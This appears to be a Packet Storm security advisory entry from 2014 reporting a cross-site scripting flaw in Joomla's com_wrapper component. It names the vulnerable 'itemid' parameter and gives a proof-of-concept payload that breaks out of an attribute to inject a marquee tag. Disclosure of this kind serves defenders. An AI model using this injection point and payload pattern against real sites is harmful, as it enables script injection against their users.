Joomla Wrapper Cross Site Scripting

2014-04-15T00:00:00
ID PACKETSTORM:126168
Type packetstorm
Reporter Renzi
Modified 2014-04-15T00:00:00

Description

                                        
                                            `# Cross Site Scripting on Joomla "com_wrapper"  
# Risk: Low  
# CWE number: CWE-79  
# Date: 15/04/2014  
# Project: www.joomla.org  
# Author: Felipe " Renzi " Gabriel  
# Contact: renzi@linuxmail.org  
# Tested on Windows 8 pro  
# Vulnerable File: index.php?option=com_wrapper&itemid=  
# Exploit:  
  
-Target: http://host.com  
-Vuln. File: /index.php?option=com_wrapper&itemid=  
-Exploit: "><marquee>Vulnerable</marquee>  
  
  
  
`